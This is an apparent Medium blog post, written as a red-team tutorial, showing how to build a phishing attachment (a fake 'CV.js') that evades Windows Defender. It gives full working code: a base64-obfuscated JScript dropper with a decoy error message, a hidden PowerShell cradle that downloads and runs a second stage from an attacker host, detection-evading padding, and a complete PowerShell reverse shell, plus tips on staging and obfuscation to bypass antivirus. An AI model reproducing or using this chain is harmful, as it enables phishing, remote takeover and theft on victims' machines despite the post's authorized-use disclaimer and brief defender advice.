Weaponize JScript to bypass Windows Defender

To gain initial access during a Red Team Engagement, Phishing might be a valid option. This is used to deliver a payload to the target. For example the payload might connect back to the Red Team (Reverse Shell). In order to execute the payload on the target, a tool has to be used.

One of the many tools that can be used for weaponization, is JScript. JScript is a scripting language created by Microsoft. By default it can be run on any Windows 10 machine. If a user double clicks on a .js — file, it will be run with WScript.exe.

In this article I will show you how to create a malicious JScript file to get a reverse shell on a fully patched Windows 10 machine with Windows Defender enabled. This article was inspired by Daniel Lowrie’s Create Custom FILELESS MALWARE on FULLY PATCHED WINDOWS 10 Video. As well as by some real world malware which I have analyzed.

Please only use this method in an authorized engagement, e.g. in your Lab, Red Team Operations, Penetration Test. Please do not use this to harm others or do something illegal!

Creating the malicious JScript file

I have named the JScript file to “CV.js”. In a Red Team Engagement this file might be send to a recruiter via a Phishing email.

I have put the following contents to the file:

function decode(input_value) {
var xmlDom = new ActiveXObject("Microsoft.XMLDOM");
var el = xmlDom.createElement("tmp");
el.dataType = "bin.Base64"
el.text = input_value;
var strm = WScript.CreateObject("ADODB.Stream");
strm.Type = 1;
strm.Open();
strm.Write(el.nodeTypedValue);
strm.Position = 0;
strm.Type = 2;
strm.CharSet = "utf-8";
var str_to_return = strm.ReadText();
strm.Close();
return str_to_return;
}
eval(decode("dmFyIHggPSBkZWNvZGUoImNHOTNaVkp6U0dWc1RDQXRkMmx1Wkc5M2MzUjViR1VnYUdsa1pHVnVJQzF1VDNBZ0xXTWdJbWxGZUNoT1pYY3RUMkpxWldOMElFNWxkQzVYUldKamJFbGxiblFwTGtSdlYyNU1UMkZrYzNSU2FXNUhLQ2RvZEhSd09pOHZNVEF1TUM0eUxqRTFPalEwTXk5WGFXNVRaV04xY21sMGVWVndaR0YwWlNjcElpQT0iKTtuZXcgQWN0aXZlWE9iamVjdChkZWNvZGUoIlYxTmpjbWx3ZEM1VGFHVnNiQT09IikpLlJ1bih4KTtXU2NyaXB0LkVjaG8oIkVycm9yOiBDb3VsZCBub3Qgb3BlbiBDViEiKQ=="))

CV.js consists of the function “decode” and an “eval” call. The decode function will take a base64 encoded string and decode it. The decode function was posted as answer to this Stackoverflow question.

The eval function will execute the JScript code after it gets decoded from base64. If you want to bypass AV, then you should heavily obfuscate your payloads. That’s why I have created this step. So the real payload doesn’t get detected through static analysis.

If we decode the base64 encoded string, we will get the following JScript code:

var x = decode("cG93ZVJzSGVsTCAtd2luZG93c3R5bGUgaGlkZGVuIC1uT3AgLWMgImlFeChOZXctT2JqZWN0IE5ldC5XRWJjbEllbnQpLkRvV25MT2Fkc3RSaW5HKCdodHRwOi8vMTAuMC4yLjE1OjQ0My9XaW5TZWN1cml0eVVwZGF0ZScpIiA=");new ActiveXObject(decode("V1NjcmlwdC5TaGVsbA==")).Run(x);WScript.Echo("Error: Could not open CV!")

The following representation is much more readable:

var x = decode("cG93ZVJzSGVsTCAtd2luZG93c3R5bGUgaGlkZGVuIC1uT3AgLWMgImlFeChOZXctT2JqZWN0IE5ldC5XRWJjbEllbnQpLkRvV25MT2Fkc3RSaW5HKCdodHRwOi8vMTAuMC4yLjE1OjQ0My9XaW5TZWN1cml0eVVwZGF0ZScpIiA=");new ActiveXObject(decode("V1NjcmlwdC5TaGVsbA==")).Run(x);WScript.Echo("Error: Could not open CV!")

First another base64 encoded string will get decoded and saved in the variable “x”. After the string gets decoded, we will receive the actual payload. It is a Powershell command to download another file from the attacker and run it

poweRsHelL -windowstyle hidden -nOp -c "iEx(New-Object Net.WEbclIent).DoWnLOadstRinG('http://10.0.2.15:443/WinSecurityUpdate')"

The line with the ActiveXObject contains “WScript.Shell” in base64. That line will create an WScript shell and run the Powershell command on the target.

Finally the WScript.Echo will show an error message. So the targeted user might think there was an error. And he/she won’t get suspicious because there was no actual CV.

Stage 2

The Powershell command which downloads “WinSecurityUpdate” will trigger stage 2. The contents of stage 2 can be seen in the following code block

$r1 = "SW5WT2tFLUVYcHJlU1NJb04gKE5ldy1PQmpFQ3QgTmVULldFYkNMaWVuVCkuRG93TmxPYURTVHJpbkcoJ2h0dHA6Ly8xMC4wLjIuMTU6NDQzL3InKQ==asdf"$p2 = $r1.substring(0,116)$update_r1 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($p2))echo $update_r1 | pow""e""rsh""ell -nop -window hidden -

First of all a variable with base64 encoded data will be initialized (r1). I have added strings at the end, to bypass detection that might be searching for base64 data. To remove the random data at the end, I have used the substring Powershell-Function. After that the base64 encoded data will be decoded. Finally the data in $update_r1 will be run.

$update_r1 contains a Powershell command to download and run a reverse shell. That’s the content of $update_r1:

InVOkE-EXpreSSIoN (New-OBjECt NeT.WEbCLienT).DowNlOaDSTrinG('http://10.0.2.15:443/r')

Reverse Shell

For the reverse shell, I have used a Powershell Reverse Shell from revshell:

$client = New-Object System.Net.S""ockets.TCPClie""nt('10.0.2.15',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Getting the Shell

As an attacker machine I have used Kali Linux. As the victim machine I have used a fully patched Windows 10 with Microsoft Defender enabled.

Conclusion

To be able to bypass AV’s a Red Team Operator should heavily obfuscate the payload. Also the created malware should utilize multiple stages. Another trick is to encode or encrypt some of the code. Especially the parts, that get detected by AV.

Also this malware is fileless (except for the weaponized JScript file). This type of malware is harder to detect, as it won’t drop any files to disk. This is also a efficient way for Red Team Operators to bypass AV.

Another important concept is generating code on the fly and executing it. This was implemented in the JScript file. Where the code was decoded from base64 and being run via “eval”.

Furthermore Blue Teamers should not rely on AV products. Blue Teamers should keep in mind to monitor for malicious JScript files and for suspicious activity. Like network traffic of a reverse shell. Or other host based malicious activity, like e.g. persistence techniques.

--

--

--

Passionate about Cyber Security. I am publishing CTF writeups and Cybersecurity content!

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Multiple environment files in a Next.js app (optional + with docker)

My Experience Implementing Stacks && Queues

How to Implement OpenID Connect Authentication Flow Inside of an iFrame

Adding Firebase Database + RestAPI to React App

How to get started debugging NodeJS applications with ndb

How to learn React Hooks, React Router, and Redux

How to generate the certificates needed for the AppStore and PlayStore

Frontend Road Map

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Rabbit

Rabbit

Passionate about Cyber Security. I am publishing CTF writeups and Cybersecurity content!

More from Medium

Revoking Third Party Application Access

Cyber Apocalypse 2022 — Precious Guidance

Pandora — HTB Write Up

Understanding Anti-analysis Techniques used in Malware